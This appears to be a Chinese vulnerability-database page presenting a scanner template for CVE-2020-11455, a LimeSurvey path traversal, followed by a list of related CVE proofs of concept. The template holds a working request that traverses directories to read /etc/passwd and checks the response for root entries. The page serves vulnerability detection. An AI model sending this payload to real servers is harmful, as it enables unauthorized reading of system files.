CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal

漏洞描述

PoC代码[已公开]

id: CVE-2020-11455

info:
  name: LimeSurvey 4.1.11 - Path Traversal
  author: daffainfo
  severity: medium
  description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
  reference:
    - https://www.exploit-db.com/exploits/48297
    - https://www.cvedetails.com/cve/CVE-2020-11455

rules:
  r0:
    request:
      method: GET
      path: /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• CVE-2020-11455: LimeSurvey 4.1.11 - Local File Inclusion POC

  2025-08-01 | LimeSurvey
  LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path tra...

• CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

  2025-09-01 | Nexus Repository
  漏洞触发需要任意账户权限 body="Nexus Repository Manager" app="Nexus-Repository-Manager"

• CVE-2020-11738: WordPress Duplicator plugin Directory Traversal POC

  2025-09-01 | WordPress Duplicator
  The issue is being actively exploited, and allows attackers to download arbitrary files, such as the...

• CVE-2020-11991: Apache Cocoon 2.1.12 XML Injection POC

  2025-09-01 | Apache Cocoon
  Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code pars...

• CVE-2020-13379: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery POC

  2025-09-01 | Grafana
  Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, wh...